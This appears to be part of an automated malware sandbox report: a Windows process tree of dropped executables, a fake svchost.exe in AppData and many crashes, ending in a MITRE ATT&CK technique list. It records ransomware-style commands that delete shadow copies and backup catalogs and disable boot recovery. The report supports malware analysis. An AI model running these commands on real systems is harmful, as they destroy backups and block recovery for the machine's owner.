C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask5⤵PID:8792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask5⤵PID:8924
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 8404⤵
- Program crash
PID:6392
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv XR3JzXNqPUW7aknY8t7QJw.0.21⤵
- Modifies data under HKEY_USERS
PID:4300
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:4336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2996 -ip 29961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3136 -ip 31361⤵PID:4340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 3956 -ip 39561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5020 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:132 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 4603⤵
- Program crash
PID:2900
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2536 -ip 25361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3400 -ip 34001⤵PID:780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 132 -ip 1321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4636 -ip 46361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2580 -ip 25801⤵PID:2272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 792 -ip 7921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2196 -ip 21961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6960 -ip 69601⤵PID:4816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6568 -ip 65681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4712 -ip 47121⤵PID:6308
-
C:\Users\Admin\AppData\Local\Temp\BB58.exeC:\Users\Admin\AppData\Local\Temp\BB58.exe1⤵
- Suspicious use of SetWindowsHookEx
PID:6716
-
C:\Users\Admin\AppData\Local\Temp\CD99.exeC:\Users\Admin\AppData\Local\Temp\CD99.exe1⤵PID:1628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3076
-
-
C:\Users\Admin\AppData\Local\Temp\302.exeC:\Users\Admin\AppData\Local\Temp\302.exe1⤵PID:5192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7940
-
-
C:\Users\Admin\AppData\Local\Temp\5374.exeC:\Users\Admin\AppData\Local\Temp\5374.exe1⤵PID:3152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 2442⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1104 -ip 11041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6972 -ip 69721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5240
-
C:\Users\Admin\AppData\Local\Temp\8505.exeC:\Users\Admin\AppData\Local\Temp\8505.exe1⤵
- Adds Run key to start application
- Enumerates connected drives
PID:1596 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start2⤵
- Enumerates connected drives
PID:7536 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:8860
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵PID:8852
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:8844
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:9048
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:8900
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 03⤵PID:8976
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵PID:8968
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:8212
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵PID:8956
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:8412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete2⤵PID:3872
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵PID:8744
-
-
-
C:\Users\Admin\AppData\Local\Temp\8505.exe"C:\Users\Admin\AppData\Local\Temp\8505.exe" -agent 02⤵
- Drops file in Program Files directory
PID:1276
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat2⤵PID:5384
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵PID:8560
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵PID:5064
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:7644
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵PID:7616
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵PID:6752
-
-
C:\Users\Admin\AppData\Local\Temp\A3B9.exeC:\Users\Admin\AppData\Local\Temp\A3B9.exe1⤵PID:7240
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"2⤵PID:6464
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7740 -s 8762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7096
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7960
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8104
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8152
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3444
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6272
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7484
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7740 -ip 77401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1628 -ip 16281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5192 -ip 51921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4172 -ip 41721⤵PID:2156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 8024 -ip 80241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3152 -ip 31521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6516 -ip 65161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 7880 -ip 78801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7224
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -Embedding1⤵PID:5124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5212 -ip 52121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7436 -ip 74361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7264 -ip 72641⤵PID:6436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1300 -ip 13001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7736
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 720 -p 6148 -ip 61481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5604
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 8352 -ip 83521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8724
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7912 -ip 79121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5216
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 760 -p 1636 -ip 16361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 9720 -ip 97201⤵PID:10016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4236 -ip 42361⤵PID:2660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 3924 -ip 39241⤵PID:7128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8244 -ip 82441⤵PID:9348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1452 -ip 14521⤵PID:7308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 5636 -ip 56361⤵PID:8332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 9920 -ip 99201⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4536 -ip 45361⤵PID:9996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 10332 -ip 103321⤵PID:10620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 10512 -ip 105121⤵PID:10780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3224 -ip 32241⤵PID:10820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 10760 -ip 107601⤵PID:11048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 12168 -ip 121681⤵PID:13184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 1272 -ip 12721⤵PID:13500
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 756 -p 3092 -ip 30921⤵PID:13864
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3092 -s 22601⤵
- Program crash
PID:8640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 13656 -ip 136561⤵PID:11612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 14596 -ip 145961⤵PID:15268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 15180 -ip 151801⤵PID:11684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 11560 -ip 115601⤵PID:16028
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:16344
-
C:\Windows\explorer.exeexplorer.exe /LOADSAVEDWINDOWS2⤵PID:17512
-
-
\Windows\System32\sihost.exe2⤵PID:3972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 14684 -ip 146841⤵PID:12704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 15648 -ip 156481⤵PID:17196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 13796 -ip 137961⤵PID:16492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 9928 -ip 99281⤵PID:15848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 17020 -ip 170201⤵PID:14436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 13028 -ip 130281⤵PID:18160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 12316 -ip 123161⤵PID:17808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 17652 -ip 176521⤵PID:17236
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3044
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:17764
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 5088 -ip 50881⤵PID:13128
-
C:\Windows\system32\werfault.exewerfault.exe /hc /shared Global\2e7a52dec8c04a88b206a75d7cb29250 /t 13832 /p 30441⤵PID:11652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:6984
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6496
-
C:\Windows\system32\werfault.exewerfault.exe /hc /shared Global\5a9caf88349e4292a090d52989d59894 /t 11088 /p 177641⤵PID:15852
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:9484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5300 -ip 53001⤵PID:18100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 9192 -ip 91921⤵PID:12204
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
5File Deletion
1Install Root Certificate
1Modify Registry
8Virtualization/Sandbox Evasion
1Web Service
1